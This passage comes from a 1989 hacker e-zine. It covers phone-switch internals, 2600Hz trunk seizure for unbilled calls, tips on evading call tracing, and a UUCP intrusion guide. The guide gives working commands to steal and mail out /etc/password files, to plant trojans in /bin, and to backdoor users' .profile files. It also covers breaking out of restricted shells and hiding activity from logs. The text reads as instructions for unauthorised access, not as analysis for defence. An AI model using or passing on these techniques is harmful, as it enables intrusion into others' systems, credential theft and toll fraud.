seen Maintenance channel output messages and a brief description of their
meaning. You will also find a list of frequently used input messages.

There are other channels as well as back ups but the only ones to be
concerned with are Recent Change and SCC maint. These are the two channels
you will most likely want to get access to. The Maintenance channel doesn't
leave the C.O. and is used by switch engineers as the primary way of
controlling the switch. During off hours and weekends the control of the
switch is transferred to the SCC.

The SCC is a centrally located bureau that has up to 16 switches
reporting to it via their SCC maint. channel. The SCC has a mini computer
running SCCS that watches the output of all these switches for trouble
conditions that require immediate attention. The SCC personnel then have the
ability to input messages to that particular switch to try and correct the
problem. If necessary, someone will be dispatched to the C.O. to correct the
problem. I should also mention that the SCC mini, SCCS has dialups and access
to SCCS means access to all the switches connected to it. The level of access
however, may be dependent upon the privileges of the account you are using.

The Recent Change channels also connect to a centrally located bureau
referred to as the RCMAC. These bureaus are responsible for activating lines,
changing class of service etc. RCMAC has been automated to a large degree by
computer systems that log into COSMOS and look for pending orders. COSMOS is
basically an order placement and record keeping system for central office
equipment, but you should know that already, right? So this system, called
Work Manager running MIZAR logs into COSMOS, pulls orders requiring recent
change work, then in one batch several times a day, transmits the orders to
the appropriate switch via it's Recent Change Channel.

Testing of the switch is done by many different methods. Bell Labs has
developed a number of systems, many accomplishing the same functions. I will
only attempt to cover the ones I know fairly well.

The primary testing system is the trunk test panels located at the switch
itself. There are three and they all pretty much do the same thing, which is
to test trunk and line paths through the switch.

Trunk and Line Test Panel
Supplementary Trunk Test Panel
Manual Trunk Test Panel

MLT (Mechanized Loop Testing) is another popular one. This system is
often available through the LMOS data base and can give very specific
measurements of line levels and losses. The "TV Mask" is also popular giving
the user the ability to monitor lines via a call back number.

DAMT (Direct Access Mechanized Testing) is used by line repairmen to put
tone on numbers to help them find lines. This was previously done by Frame
personnel, so DAMT automated that task. DAMT can also monitor lines, but
unfortunately, the audio is scrambled in a manor that allows one only to tell
what type of signal is present on the line, or whether it is busy or not.

All of these testing systems have one thing in common: they access the
line through a "No Test Trunk". This is a switch which can drop in on a
specific path or line and connect it to the testing device. It depends on
the device connected to the trunk, but there is usually a noticeable "click"
heard on the tested line when the No Test Trunk drops in. Also the testing
devices I have mentioned here will seize the line, busying it out. This will
present problems when trying to monitor calls, as you would need to drop in
during the call. The No Test Trunk is also the method in which operator
consoles perform verifications and interrupts.

** INTEROFFICE SIGNALLING **

Calls coming into and leaving the switch are routed via trunks. The
switches select which trunk will route the call most effectively and then
retransmits the dialed number to the distant switch. There are several
different ways this is done. The two most common are Loop Signaling and CCIS,
Common Channel Interoffice Signaling. The predecessor to both of these is the
famous and almost extinct "SF Signaling". This utilized the presence of
2600hz to indicate trunks in use. If one winks 2600Hz down one of these
trunks, the distant switch would think you hung up. Remove the 2600, and you
have control of the trunk and you could then MF a number. This worked great
for years. Assuming you had dialed a toll free number to begin with, there
was no billing generated at all. The 1AESS does have a program called SIGI
that looks for any 2600 winks after the original connection of a toll call.
It then proceeds to record on AMA and output any MF digits received. For more
information on AMA see Phantom Phreaker's article entitled, Understanding
Automatic Message Accounting in the LOD/H TJ Issue #3. However due to many
long distant carriers using signaling that can generate these messages it is
often overlooked and "SIG IRR" output messages are quite common.

Loop signaling still uses MF to transmit the called number to distant
switches, however, the polarity of the voltage on the trunk is reversed to
indicate trunk use.

CCIS sometimes referred to CCS#6 uses a separate data link sending
packets of data containing information regarding outgoing calls. The distant
switch monitors the information and connects the correct trunk to the correct
path. This is a faster and more efficient way of call processing and is being
implemented everywhere. The protocol that AT&T uses is CCS7 and is currently
being accepted as the industry standard. CCS6 and CCS7 are somewhat similar.

Interoffice trunks are multiplexed together onto one pair. The standard
is 24 channels per pair. This is called T-1 in it's analog format and D-1
in its digital format. This is often referred to as carrier or CXR. The terms
frame error and phase jitter are part of this technology which is often a
world in itself. This type of transmission is effective for only a few miles
on twisted pair. It is often common to see interoffice repeaters in manholes
or special huts. Repeaters can also be found within C.O.s, amplifying trunks
between offices. This equipment is usually handled by the "carrier" room,
often located on another floor. Carrier also handles special circuits, private
lines, and foreign exchange circuits.

After a call reaches a Toll Switch, the transmit and receive paths of
the calling and called party are separated and transmitted on separate
channels. This allows better transmission results and allows more calls to
be placed on any given trunk. This is referred to as 4 wire switching. This
also explains why during a call, one person can hear crosstalk and the other
cannot. Crosstalk will bleed over from other channels onto the multiplexed
T-Carrier transmission lines used between switches.

** CALL TRACING

So with the Loop Signaling standard format there is no information being
transmitted regarding the calling number between switches. This therefore
causes the call tracing routine to be at least a two step process. This is
assuming that you are trying to trace an anticipated call, not one in
progress. When call trace "CLID" is placed on a number, a message is output
every time someone calls that number. The message shows up on most of the ESS
output channels and gives information regarding the time and the number of the
incoming trunk group. If the call came from within that office, then the
calling number is printed in the message. Once the trunk group is known, it
can usually be determined what C.O. the calls are coming from. This is also
assuming that the calls are coming from within that Bell company and not
through a long distance carrier (IEC). So if Bell knows what C.O. the calls
are coming from, they simply put the called number on the C.I. list of that
C.O. Anytime anyone in that C.O. calls the number in question another message
is generated showing all the pertinent information.

Now if this were a real time trace it would only require the assistance
of the SCC and a few commands sent to the appropriate switches (i.e.
NET-LINE). This would give them the path and trunk group numbers of the call
in progress. Naturally the more things the call is going through, the more
people that will need to be involved in the trace. There seems to be a common
misconception about the ability to trace a call through some of the larger
packet networks i.e. Telenet and TYMNET. Well I can assure you, they can
track a call through their network in seconds (assuming multiple systems
and/or network gateways are not used) and then all that is needed is the
cooperation of the Bell companies. Call tracing in itself it not that
difficult these days. What is difficult is getting the different organizations
together to cooperate. You have to be doing something relatively serious to
warrant tracing in most cases, however, not always. So if tracing is a
concern, I would recommend using as many different companies at one time as
you think is necessary, especially US Sprint, since they can't even bill
people on time much less trace a call. But...it is not recommended to call
Sprint direct, more on that in the Equal Access section.

** EQUAL ACCESS

The first thing you need to understand is that every IEC Inter Exchange
Carrier (long distance company) needs to have an agreement with every LEC
Local Exchange Carrier (your local phone company) that they want to have
access to and from. They have to pay the LEC for the type of service they
receive and the amount of trunks, and trunk use. The cost is high and the
market is a zoo. The LECs have the following options:

- Feature Group A -

This was the first access form offered to the IECs by the LECs. Basically
whenever you access an IEC by dialing a regular 7 digit number (POTS line)
this is FGA. The IECs' equipment would answer the line and interpret your
digits and route your call over their own network. Then they would pick up an
outgoing telephone line in the city you were calling and dial your number
locally. Basically a dial in, dial out situation similar to Telenet's
PC pursuit service.

- Feature Group B -

FGB is 950-xxxx. This is a very different setup from FGA. When you dial
950, your local switch routes the call to the closest Access Tandem (AT) (Toll
Switch) in your area. There the IECs have direct trunks connected between the
AT and their equipment. These trunks usually use a form of multiplexing like
T-1 carrier with wink start (2600Hz). On the incoming side, calls coming in
from the IEC are basically connected the same way. The IEC MFs into the AT
and the AT then connects the calls. There are many different ways FGB is
technically setup, but this is the most common.

Tracing on 950 calls has been an area of controversy and I would like to
clear it up. The answer is yes, it is possible. But like I mentioned earlier,
it would take considerable manpower which equals expensive to do this. It
also really depends on how the IEC interface is set up. Many IECs have
trunks going directly to Class 5 end offices. So, if you are using a small
IEC, and they figure out what C.O. you are calling from, it wouldn't be out
of the question to put CLID on the 950 number. This is highly unlikely and I
have not heard from reliable sources of it ever being done. Remember, CLID
generates a message every time a call is placed to that number. Excessive
call trace messages can crash a switch. However, I should mention that brute
force hacking of 950s is easily detected and relatively easy to trace. If the
IEC is really having a problem in a particular area they will pursue it.

- Feature Group C -

FGC is reserved for and used exclusively by AT&T.

- Feature Group D -
FGD is similar to FGB with the exception that ANI is MF'ed to the IEC.
The end office switch must have Equal Access capability in order to transmit
the ANI. Anything above a X-bar can have it. FGD can only be implemented on
800 numbers and if an IEC wants it, they have to buy the whole prefix. For a
list of FGD prefixes see 2600 Magazine. You should also be aware that MCI,
Sprint, and AT&T are offering a service where they will transmit the ANI to
the customer as well. You will find this being used as a security or
marketing tool by an increasing amount of companies. A good example would be
800-999-CHAT.

** OUTPUT MESSAGES **

The following is a compiled list of common switch messages. The list was
compiled from various reference materials that I have at my disposal.

1AESS COMMON OUTPUT MESSAGES
--------------------------------------

MSG. DESCRIPTION
----------------------------------------------------------------
** ALARM **

AR01 Office alarm
AR02 Alarm retired or transferred
AR03 Fuse blown
AR04 Unknown alarm scan point activated
AR05 Commercial power failure
AR06 Switchroom alarm via alarm grid
AR07 Power plant alarm
AR08 Alarm circuit battery loss
AR09 AMA bus fuse blown
AR10 Alarm configuration has been changed (retired,inhibited)
AR11 Power converter trouble
AR13 Carrier group alarm
AR15 Hourly report on building and power alarms

** AUTOMATIC TRUNK TEST **
AT01 Results of trunk test

** CARRIER GROUP **
CG01 Carrier group in alarm
CG03 Reason for above

** COIN PHONE **
CN02 List of pay phones with coin disposal problems
CN03 Possible Trouble
CN04 Phone taken out of restored service because of possible coin fraud

** COPY **
COPY Data copied from one address to another

** CALL TRACE **
CT01 Manually requested trace line to line, information follows
CT02 Manually requested trace line to trunk, information follows
CT03 Intraoffice call placed to a number with CLID
CT04 Interoffice call placed to a number with CLID
CT05 Call placed to number on the CI list
CT06 Contents of the CI list
CT07 ACD related trace
CT08 ACD related trace
CT09 ACD related trace

** DIGITAL CARRIER TRUNK **
DCT COUNTS Count of T carrier errors

** MEMORY DIAGNOSTICS **
DGN Memory failure in cs/ps diagnostic program

** DIGITAL CARRIER "FRAME" ERRORS **
FM01 DCT alarm activated or retired
FM02 Possible failure of entire bank not just frame
FM03 Error rate of specified digroup
FM04 Digroup out of frame more than indicated
FM05 Operation or release of the loop terminal relay
FM06 Result of digroup circuit diagnostics
FM07 Carrier group alarm status of specific group
FM08 Carrier group alarm count for digroup
FM09 Hourly report of carrier group alarms
FM10 Public switched digital capacity failure
FM11 PUC counts of carrier group errors

** MAINTENANCE **
MA02 Status requested, print out of MACII scratch pad
MA03 Hourly report of system circuits and units in trouble
MA04 Reports condition of system
MA05 Maintenance interrupt count for last hour
MA06 Scanners,network and signal distributors in trouble
MA07 Successful switch of duplicated unit (program store etc.)
MA08 Excessive error rate of named unit
MA09 Power should not be removed from named unit
MA10 OK to remove paper
MA11 Power manually removed from unit
MA12 Power restored to unit
MA13 Indicates central control active
MA15 Hourly report of # of times interrupt recovery program acted
MA17 Centrex data link power removed
MA21 Reports action taken on MAC-REX command
MA23 4 minute report, emergency action phase triggers are inhibited

** MEMORY **
MN02 List of circuits in trouble in memory

** NETWORK TROUBLE **
NT01 Network frame unable to switch off line after fault detection
NT02 Network path trouble Trunk to Line
NT03 Network path trouble Line to Line
NT04 Network path trouble Trunk to Trunk
NT06 Hourly report of network frames made busy
NT10 Network path failed to restore

** OPERATING SYSTEM STATUS **
OP:APS-0
OP:APSTATUS
OP:CHAN
OP:CISRC Source of critical alarm, automatic every 15 minutes
OP:CSSTATUS Call store status
OP:DUSTATUS Data unit status
OP:ERAPDATA Error analysis database output
OP:INHINT Hourly report of inhibited devices
OP:LIBSTAT List of active library programs
OP:OOSUNITS Units out of service
OP:PSSTATUS Program store status

** PLANT MEASUREMENTS **
PM01 Daily report
PM02 Monthly report
PM03 Response to a request for a specific section of report
PM04 Daily summary of IC/IEC irregularities

** REPORT **
REPT:ADS FUNCTION Reports that a ADS function is about to occur
REPT:ADS FUNCTION DUPLEX FAILED No ADS assigned
REPT:ADS FUNCTION SIMPLEX Only one tape drive is assigned
REPT:ADS FUNCTION STATE CHANGE Change in state of ADS
REPT:ADS PROCEDURAL ERROR You fucked up
REPT:LINE TRBL Too many permanent off hooks, may indicate bad cable
REPT:PROG CONT OFF-NORMAL System programs that are off or on
REPT:RC CENSUS Hourly report on recent changes
REPT:RC SOURCE Recent change system status (RCS=1 means RC Channel inhibited)

** RECENT CHANGE **
RC18 RC message response

** REMOVE **
RMV Removed from service

** RESTORE **
RST Restored to service status

** RINGING AND TONE PLANT **
RT04 Status of monitors

** SOFTWARE AUDIT **
SA01 Call store memory audit results
SA03 Call store memory audit results

** SIGNAL IRREGULARITY **
SIG IRR Blue box detection
SIG IRR INHIBITED Detector off
SIG IRR TRAF Half hour report of traffic data

** TRAFFIC CONDITION **
TC15 Reports overall traffic condition
TL02 Reason test position test was denied
TL03 Same as above

** TRUNK NETWORK **
TN01 Trunk diagnostic found trouble
TN02 Dial tone delay alarm failure
TN04 Trunk diag request from test panel
TN05 Trunk test procedural report or denials
TN06 Trunk state change
TN07 Response to a trunk type and status request
TN08 Failed incoming or outgoing call
TN09 Network relay failures
TN10 Response to TRK-LIST input, usually a request from test position
TN11 Hourly, status of trunk undergoing tests
TN16 Daily summary of precut trunk groups

** TRAFFIC OVERLOAD CONDITION **
TOC01 Serious traffic condition
TOC02 Reports status of less serious overload conditions

** TRANSLATION ** (shows class of service, calling features etc.)
TR01 Translation information, response to VFY-DN
TR03 Translation information, response to VFY-LEN
TR75 Translation information, response to VF:DNSVY
** **
TW02 Dump of octal contents of memory

1AESS COMMON INPUT MESSAGES
-------------------------------------

Messages always terminate with ". ctrl d " x=number or trunk network #

MSG. DESCRIPTION
------------------------------------------------------------------------
NET-LINE-xxxxxxx0000 Trace of path through switch
NET-TNN-xxxxxx Same as above for trunk trace
T-DN-MBxxxxxxx Makes a # busy
TR-DEACTT-26xxxxxxx Deactivates call forwarding
VFY-DNxxxxxxx Displays class of service, calling features etc.
VFY-LENxxxxxxxx Same as above for OE
VFY-LIST-09 xxxxxxx Displays speed calling 8 list

************************************************************************

There are many things I didn't cover in this article and many of the
things I covered, I did so very briefly. My intention was to write an article
that explains the big picture, how everything fits together. I hope I helped.

Special thanks to all the stupid people, for without them some of us
wouldn't be so smart and might have to work for a living. Also all the usual
Bell Labs, AT&T bla bla bla etc. etc.

I can usually be reached on any respectable board, ha!

Agent Steal Inner (C)ircle 1989

!!!!!

!!!!! FREE KEVIN MITNICK !!!!!

!!!!!

[End Of Article]

The LOD/H Technical Journal, Issue #4: File 05 of 10

=====================================================
|| ||
|| A Hacker's Guide to UUCP ||
|| ||
|| by ||
|| ||
|| The Mentor ||
|| ||
|| Legion of Doom/Hackers ||
|| ||
|| 08/04/89 ||
|| ||
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD

Scope
DDDDD

Part I of this file is intended for the casual hacker- someone
familiar with UNIX commands, but who hasn't had extended experience
with the UUCP network. Part II will be intended for the advanced
hacker who has the confidence and knowledge to go out and modify
a UNIX network- the logs, the paths, the permissions, etc...

Introduction
DDDDDDDDDDDD

Like it or not, UNIX is the most popular operating system in the
world. As a hacker, you are likely to run into several hundred
UNIX machines over the course of your hacking career. Knowing how
to move around and use the UNIX environment should be considered
absolutely essential, especially since UNIX is the operating system
of choice among phone company computers.

This article is not an attempt to teach you how to use UNIX.
If you don't know what a '$ls -x > dir' does, you need to put this
article in your archives, get a good basic file on UNIX (or buy a
book on it- there are several good ones out ((see the Bibliography
at the end of this file for suggestions))), read it, and then play
around some in a UNIX machine. Please! If you have managed to
stumble into a Bell system, do *not* use it as a machine to learn
UNIX on! You *will* get noticed by security, and this will lead
not only to the security being tightened, but may well lead to Bell
Security going through your underwear drawer.

The information in this article is mainly concerning AT&T System
V UNIX. I have included BSD 4.3 & Xenix information also in cases
that I was able to determine alternate procedures. All information
has been thoroughly tested and researched on as many machines as
possible. Standard disclaimer, your system may be slightly
different.

Glossary & Usage
DDDDDDDDDDDDDDDD

BNU - Basic Networking Utilities. System V.3's uucp package.
daemon - A program running in the background.
LAN - Local Area Network.
network - A group of machines set up to exchange information and/or
resources.
node - A terminating machine on a network.
UUCP - When capitalized, refers to the UNIX networking utilities
package.
uucp - In lower case, refers to the program Unix-to-Unix-CoPy.

I. General Information
DDDDDDDDDDDDDDDDDDD

A. What is UUCP?

UUCP is a networking facility for the UNIX operating system.
It is made up of a number of different programs that allow UNIX
machines to talk to each other. Using UUCP, you can access a
remote machine to copy files, execute commands, use resources, or
send mail. You can dial out to other non-UNIX computers, and you
can access public mail/news networks such as USENET.

B. History of UUCP

The first UUCP system was built in 1976 by Mike Lest at AT&T
Bell Labs. This system became so popular that a second version was
developed by Lesk, David Nowitz, and Greg Chesson. Version 2 UUCP
was distributed with UNIX Version 7.

With System V Release 3, a new version of UUCP that was
developed in 1983 by Peter Honeyman, David A. Nowitz, and Brian E.
Redman. This version is known as either HoneyDanBer UUCP (from the
last names of the developers), or more conventionally as Basic
Networking Utilities (BNU). I will stick with BNU, as it is easier
to type. BNU is backward compatible with Version 2, so there is
no problem communicating between the two.

BSD 4.3's UUCP release incorporates some of the BNU features,
but retains more similarity to Version 2 UUCP.

If you are unsure about which version of UUCP is on the system
that you are in, do a directory of /usr/lib/uucp and look at the
files. If you have a file called L.sys, you are in a Version 2
system. If there is a file called Systems, then it's BNU. See
Table 1 for a fairly complete listing of what system runs what UUCP
version.

Table 1*
DDDDDDD
Manufacturer Model UNIX/UUCP Version

_____________________________________________________________
| | | |
| Apollo | 3000 Series (Domain) | BSD 4.2/Version 2|
| Altos | All models | Xenix/Version 2 |
| AT&T | 3B1 (UNIX PC) | System V.2/Vers.2|
| AT&T | 3B2 | System V.3/BNU |
| AT&T | 3B15 | System V.3/BNU |
| Convergent | Miniframe (CTIX) | System V.2/Vers.2|
| Technologies | Mightframe (CTIX) | System V.3/BNU |
| DEC | MicroVAX | Ultrix/Vers. 2 + |
| DEC | VAX | BSD 4.3/Vers. 2 +|
| Encore | Multimax | System V.3/BNU |
| IBM | PC-RT (AIX) | System V.2/Vers.2|
| Masscomp | MC-5000 Series | System V.3/BNU |
| Microport | PC/AT | System V.2/Vers.2|
| NCR | Tower 32/16 | System V.2/Vers.2|
| Prime | EXL Series | System V.2/Vers.2|
| Pyramid | 90x | BSD 4.2/Version 2|
| SCO/Xenix | PC/XT | System V.2/Vers.2|
| Unisys | 5000 & 7000 Series | System V.2/Vers.2|
| | | |
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
* This table is slightly outdated. Some of the systems may have
upgraded since this article was written.

II. UUCP Communications
DDDDDDDDDDDDDDDDDDD

A. Overview of UUCP User Programs

There are a number of programs that are used by a UUCP
communication network. Some are standard UNIX programs, others are
exclusively part of the UUCP package.
................................................................

These three are standard UNIX commands:

mail- UNIX's mail facility can be used to send messages
to other systems on a UUCP network.
cu- Connects you to a remote machine and allows you to
be logged in simultaneously to both machines. Also
allows you execute commands on either machine
without dropping the link.
tip- (BSD) same as cu.

+++

There are five main programs within UUCP:

uucp- Does all the setup for a remote file transfer.
uucp creates files that describe the file transfer
(called 'work' files), then calls the uucico daemon
to do the actual work.
uux- Used to execute commands on a remote machine. uux
performs similar to uucp, except that commands are
processed instead of files.
uuname- Used to list the names of other systems that are
connected to your network.
uulog- Displays the uucp log for the specified machine.
I'll be showing how to cover your uucp tracks from
this later in the article.
uustat- Gets the status of uux requests. Also lets you
manipulate the contents of a UUCP queue.

+++

System V also has two additional programs:

uuto- Allows you to send files to another user similar
to the UNIX mail command.
uupick- Allows you to read files sent to you with uuto.

+++

BSD 4.3 has two additional programs:

uuq- Lets you view & manipulate UUCP jobs that are
waiting to be processed, similar to System V's
uupick program.
uusend- Lets you forward files through a string of systems.
..................................................................

III. Using the Programs
DDDDDDDDDDDDDDDDDD

A. uuname

This one is easy & friendly. All you do is type '$uuname'.
It will spit out a list of all systems on your network. If you
aren't sure about the name of your local system, invoke uuname with
the -l option. ($uuname -l).

B. mail

I'm not going to say to much about mail, as it isn't a program
that you will use much as a hacker except possibly to break out of
a shell. Sending mail to other people is not a good way to stay
hidden, as all mail transfer to remote systems is logged (no, they
may not read the mail, but they're likely to notice that the
unassigned ADMIN account is suddenly getting mail from all over the
world...) These logs can be modified, however. This will
be covered in Part II.

Briefly, mail is invoked with the command 'mail username' (or
mailx under some systems). If you wish to send mail to user john
on the system you're on, you would type:

mail john
Dear John-
This is mail. Enjoy it.
^D (usage note, this means control-D)

To send mail to a user on a remote system, or a string of
systems, you would use the ! key to indicate a remote system name.
If you were on node Alpha and wanted to send mail to john on node
Beta, you would address your mail to 'mail Beta!john'. If you
wanted to send mail to a user on system that's not connected to
yours, but *is* connected to a machine you are connected to, you
would string together the system names, separated by a !. For
example, if node Saturn was connected to Beta, but not to Alpha,
you could send mail to susan on Saturn with 'mail Beta!Saturn!susan'.

Please note- If you are running the C-Shell or Bourne Shell,
you will have to prefix the ! with a X. i.e. 'mail BetaX!SaturnX!susan'.
Also, the mail header displays the system name, return path, and account
name that you send mail from, so don't try to anonymously mail someone
a message- it won't work.

Another quick feature (this is under the 'basic unix
knowledge' category), if you want to mail a file named 'message'
to someone, you'd type the following - '$mail Beta!Saturn!susan <
message'.

Finally, as mentioned above, it may be possible to break out
of a restricted shell within mail. Simply send mail to yourself,
then when you enter mail to read the message, type !sh to exit from
mail into shell. This will often blow off the restricted shell.

C. File Transfer

One of the first things that you will want to do when you
discover that you're on a network (uuname, remember?) is to grab
a copy of the /etc/password file from the systems on the net then
run Shooting Shark's password hacking program from TJ Issue #2.
Even if you have no use for it now, save it & label it, you never
know when you might need to get into that system. Besides, when
printed, they make fun & interesting wallpaper.

Unfortunately, the /etc/ directory will sometimes have access
restricted. You can get around this by copying the /etc/password
file to the /usr/spool/uucppublic directory using the uux command
(see below). If the uux program has restrictions on in, then you
may have to actually hack into the remote system using the rlogin
command. Be persistent.

UUCP is also useful in that it allows you to send a file from
your system to a remote system. Got a nice little trojan you need
to insert on their system? Use UUCP to drop it into the /bin/
directory. Or if they protected the /bin/ directory (likely, if
they have half a brain), they might have forgotten to protect all
of the users private directories (i.e. /usr/mike or /usr/susan or
sometimes even /usr/admin). UUCP a copy of a .profile file to your
system, insert your own stuff in it, then UUCP it back to its
original directory where the user will access it the next time he
logs in. People rarely $cat their .profile file, so you can
usually get away with murder in them.

While uucp has some limitations, it has the advantage of being
present on every UUCP system in the world. If you're on a System
V, you will probably use uuto & uupick much more frequently, as
it's easier to do subtle hacks with them. But if uucp is all you
have, remember, you're a hacker. Show some ingenuity. The syntax
of uucp when sending a file is:

$uucp [options] <local source> <remote destination>

For example, you have a program sitting in your working
directory on node Alpha called 'stuff', and you want to plop it
into the /usr/spool/uucppublic/mike/ directory of node Beta. The
command would be '$uucp stuff Beta!/usr/spool/uucppublic/mike/'.
(Don't forget to add a slash in front of the exclamation point if
you're in C-Shell or Bourne!) A good thing to know that will save
you some typing is that the /usr/spool/uucppublic/ directory can
be abbreviated as D/ (in KSH only), so that the above command could look
like '$uucp stuff Beta!D/mike/'. You can also specify a path other than
D/. If you wish to drop your 'new & improved' version of the
/etc/password file into the /etc/ directory, you could do a '$uucp
password Beta!/etc/'. Just don't be surprised if it gets bounced
with a message similar to the following:

From uucp Sat Dec 24 23:13:15 1988
Received: by Beta.UUCP (2.15/3.3)
id AA25032; Sat Dec 24 23:13:15 edt
Date: Sat Dec 24 23:13:15 edt
From: uucp
Apparently to: hacker
Status: R

file /etc/password, system Beta
remote access to path/file denied

Another hacker-friendly feature of UUCP is the ability to copy
something into a remote user's login directory by entering a D
character before the username. For example, to dump a modified
profile file into a user on Beta named alex, you would do the
following:

'$uucp .profile Beta!Dalex'

The syntax for uucp when receiving a remote file is:

$uucp [options] <remote path> <local directory>

For example, you wish to grab Beta's password file and put it in
a subdirectory called tmp in the account 'hacker' on node Alpha.
The command would be:

'$uucp Beta!/etc/password Alpha!/usr/hacker/tmp/'.

The same things concerning use of tildes (D) demonstrated in
sending files applies when receiving them. The following table
contains valid options to the uucp command.

Table 2
DDDDDDD
_________________________________________________
| |
| -C Copy the local source file to the spool |
| directory before attempting the trans- |
| fer. |
| |
| -f If the directory doesn't exist, abort the |
| transfer. Normally uucp will create any |
| non-existent directories, which is bad |
| technique if you're a good hacker... |
| |
| -j Display the UUCP job request number. This |
| is useful if you're going to use uustat |
| to manipulate & reroute UUCP requests in |
| the queue. |
| |
| -m Notify sender by mail when copy is done. |
| Potentially hazardous, as incoming mail |
| is logged. Later on I'll show how to |
| modify that log... |
| |
| -n<username> Notify the user specified on |
| the remote system when the xfer is done. |
| I assume everyone sees how foolish this |
| would be, right? |
| |
| -r Queue the job, but do not contact remote |
| system immediately. Can't see any pros |
| or cons in using this one... |
| |
| -s<filename> Pipe the UUCP status messages |
| to filename. Useful if you wish to log |
| off & then check the progress later. |
| |
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD

D. Executing Remote Commands

The uux program allows users to execute a program on another
system on the network. While in theory this is the most useful
command a hacker can use, in practice it is usually heavily
restricted- any system administrator with half a brain realizes
that letting people execute any command they like from across the
country is not the way to maintain system integrity.

There are, however, some useful things that can be done with
uux even if the sysadmin has protected the things that *he* thinks
are dangerous (remember, he's not a hacker, you are. You are
smarter, more persistent, and much cleverer than he is. He doesn't
like coming to work every day, can't wait to leave, and will do the
minimum possible to get by. You're different. You're dedicated &
tricky. You *like* what you're doing. If you don't, get the hell
out & let others who do take over. End of the pep talk.)

The format for the uux command is:

$uux [options] command-string.

See Table 3 below for a list of options.

Ok, ideal case. The System manager of Beta is an idiot who
has left all possible commands open, and the uucico daemon has root
privs. Let's say you want to alter the protection of the password
file, copy it into the D/ (public, remember?) directory, then copy
it over to your system. The sequence of commands would be:

$uux Beta!chmod 777 /etc/password
$uux Beta!cp /etc/password /usr/spool/uucppublic/info.txt
$uucp Beta!D/info.txt /usr/hacker/

The first line would modify the protection where anyone could
get to it, the second line would copy it into the D/ directory, and
the third line would send it along to you.

Unfortunately, most commands are disabled (useful ones like
chmod and cat and ls, at least.) But sometimes you can get around
that. For instance, often you might not be able to ls or cp the
password file. But very rarely will mail be disabled. So if you
wanted a copy of the password file, you have them mail you one:

$uux Beta!mail Alpha!hacker < /etc/password

Later in the UUCP Administration section, I'll explain how to
modify the remote system so any command you want is executable.

When you execute a remote command, UUCP will automatically
send you mail telling you how it went. It's a good idea to check
the logs and see if there's anything you need to remove to cover
your presence (this subject will be covered in Part II).

If you are executing a command that is going to need data from
a file, you specify that the file is on your local system by
prefacing it with a X!. I can't think of many reasons to use this,
but perhaps you can. As an example, let's say you wanted to print
a file in your directory called 'stuff' out on a remote laser
printer (bad hacking practice, and difficult to retrieve.) Do this:

$uux Beta!lp -dlaser X!stuff

If the command you want to execute (whodo in this example) is
forbidden, you will get a notification message similar to the
following:

>From uucp Sat Dec 24 23:12:15 EDT 1988
>From uucp Sat Dec 24 23:12:13 EDT 1988 remote from Beta
Status: R0
uuxqt cmd (whodo) status (DENIED)

If you are going to need the standard output for a command,
pipe it into D/. And any files or processes created by uux will
belong to the user uucp, not to you.

Table 3
DDDDDDD
__________________________________________________________
| |
| -a<username> Notify user username when completed. |
| |
| -b Print the Standard Input when the exit status |
| indicates an error. |
| |
| -c Do not copy files to the spool directory (I |
| recommend this one...too big a chance of someone |
| glancing in the spool dir. |
| |
| -g<char or num> Sets the priority of the transfer. |
| The lower alphabetically or numerically that |
| the char or num is, the faster the process will |
| be executed. i.e. -ga or -g2 will go faster |
| than -gr or -g8. |
| |
| -j Print the UUCP job number. Useful if you're |
| going to be playing with the queue. |
| |
| -I (BSD Only) Make a link from the original file to |
| the spool dir. I'm not sure what this is for. |
| |
| -L (BSD Only) Start up the uucico daemon. |
| |
| -n Don't notify by mail. Recommended if you don't |
| have the authority or knowledge to modify the |
| system mail logs. |
| |
| -p Use Standard Input |
| |
| -r Queue the job but don't start uucico. |
| |
| -s<filename> Send transfer status to file filename. |
| |
| -x<0..9> Set level of debugging information. |
| |
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD

E. uustat & uulog

These two programs are used to track UUCP jobs and examine
their status.

uustat prints out a one-line summary for each job, telling you
if the job is finished or the job is queued. Older versions of
uustat will have the job state as either JOB DELETED or JOB IS
QUEUED. The output of uustat will look like the following:

$uustat

1001 hacker Alpha 10/31-09:45 10/31-10:15 JOB IS QUEUED
1002 hacker Alpha 10/30-08:15 10/30-11:25 COPY FINISHED
| | | | | |
| | | | | |
job # user node start-time status-time job-status

See Table 4 for a list of options for the uustat command.

uulog is a more thorough version of uustat, as it tracks the
status messages logged by the system as your job proceeded through
the system. See Table 5 for options of the uulog command.

Table 4*
DDDDDDD
_________________________________________________
| |
| -a report all queued jobs. |
| |
| -k<job#> kill job # job#. |
| |
| -m report if another system is accessible. |
| |
| -q report the number of jobs queued for |
| all systems on the net. |
| |
| -s<system> report the status of jobs for |
| the system named systemname. |
| |
| -u<username> report the status of jobs for |
| user username. |
| |
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
* There are several other options such as -o and
-y that are system specific, and aren't really
that useful to begin with.

Table 5
DDDDDDD
______________________________
| |
| -s<system> same as uustat |
| |
| -u<userid> same as uustat |
| |
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDD

******************************************************************

This marks the end of Part I. If time permits a Part II will be in
the next LOD/H Technical Journal.

(c) 1989 The Mentor
Legion of Doom/Legion of Hackers

******************************************************************

The LOD/H Technical Journal, Issue #4: File 06 of 10.

The History of LOD/H
Revision #3 May 1990
written by Lex Luthor

NOTES: I approximated all dates, as my records are not totally complete.
If I left anyone out or put someone in that shouldn't be in, sorry I
tried and did spend considerable time researching the dates and
BBS files, the old LOD BBS software, etc. Revisions one and two were
released to LOD/H members only. Some information may only be relevant
to those who were around at the time.

The primary purpose of this article is simply to present an accurate
picture of events and people who have been associated with this group. The
reputation of many groups and many people have been tainted by slanderous
remarks made by uninformed law enforcement and justice department personnel,
the media, and other hackers. I find this sad, but it's a fact of life that
must be endured. All that can be done in this article is to attempt to present
the facts as I see them. Due to the wild and unfounded accusations by said
persons, today LOD is viewed more as malicious criminals than as for what it
was viewed as in the past. That is, of a group of people who put themselves at
risk to help inform others. Of course this is a prettier picture than most
want to believe, and is slightly prettier than what it is in actuality, but
the ideal is there. Whenever a group of individuals get together, you cannot
